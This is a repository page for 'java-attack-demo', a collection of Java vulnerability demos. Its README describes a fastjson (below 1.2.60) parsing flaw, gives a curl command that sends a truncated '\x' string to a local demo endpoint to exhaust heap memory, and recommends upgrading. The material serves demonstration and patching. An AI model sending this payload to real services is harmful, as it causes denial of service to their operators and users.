# java-attack-demo

**Repository Path**: icehand/java-attack-demo

## Basic Information

- **Project Name**: java-attack-demo
- **Description**: 搜集各个java漏洞demo
- **Primary Language**: Java
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2019-09-23
- **Last Updated**: 2020-12-19

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

# java-attack-demo

#### 介绍
搜集各个java漏洞demo

#### fastjson1.2.60以下漏洞
    字符串\x解析问题
    向使用fastjson解析的接口发送死亡字符串 {"a":"\x
    会导致应用堆内存溢出
```
curl http://localhost:8881/demo/fastjson/1.2.59/attack?m={"a":"\x
```
    建议升级最新的fastjson版本